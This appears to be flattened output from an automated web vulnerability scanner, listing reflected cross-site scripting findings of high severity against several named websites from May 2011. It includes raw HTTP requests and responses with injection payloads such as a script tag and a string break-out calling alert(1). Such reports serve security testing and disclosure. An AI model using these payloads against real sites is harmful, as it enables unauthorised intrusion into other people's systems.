HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 17:00:45 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 17:00:46 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8817 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-contentbc1cf"><script>alert(1)< Host: gold.insidenetwork.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 16:59:16 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 16:59:16 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8787 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-content Host: gold.insidenetwork.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 17:00:02 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 17:00:04 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8787 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-content Host: gold.insidenetwork.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 17:00:52 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 17:00:53 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8787 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-content Host: gold.insidenetwork.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 17:01:37 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 17:01:37 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8787 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://gold.insidenetwork |
Path: | /facebook/wp-content |
GET /facebook/wp-content Host: gold.insidenetwork.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=9bij1cq4k9 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 17:02:22 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://gold.insidenetwork Last-Modified: Sun, 15 May 2011 17:02:22 GMT Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 8787 <!-- ///////////////////////// Header ///////////////////////// --> <!DO ...[SNIP]... <input type="hidden" name="amember_redirect ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.criteo.com |
Path: | /templates/criteo/js |
GET /templates/criteo/js Host: www.criteo.com Proxy-Connection: keep-alive Referer: http://www.criteo.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94712387 |
HTTP/1.1 200 OK Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT Date: Sun, 15 May 2011 16:58:08 GMT Server: Apache/2.2.X (OVH) X-Powered-By: PHP/4.4.9 Content-Type: application/x-javascript Content-Length: 4827 var templateImagePath = "/templates/criteo/ima/8de30";alert(1)/ var successStoriesHeight = 0; window.addEvent("load", function () { $$("a").each(function (obj) { if (obj.href && obj.rel == "external") { obj.target = "_blank"; } }); }); function ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.criteo.com |
Path: | /templates/criteo/js |
GET /templates/criteo/js Host: www.criteo.com Proxy-Connection: keep-alive Referer: http://www.criteo.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94712387 |
HTTP/1.1 200 OK Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT Date: Sun, 15 May 2011 16:56:36 GMT Server: Apache/2.2.X (OVH) X-Powered-By: PHP/4.4.9 Content-Type: application/x-javascript Content-Length: 4826 var templateImagePath = "/templates/criteo/images var successStoriesHeight = 0; window.addEvent("load", function () { $$("a").each(function (obj) { if (obj.href && obj.rel == "external") { obj.target = "_blank"; } }); }); function pre ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hubspot.com |
Path: | /free-trial/Default.aspx |
GET /free-trial/Default.aspx |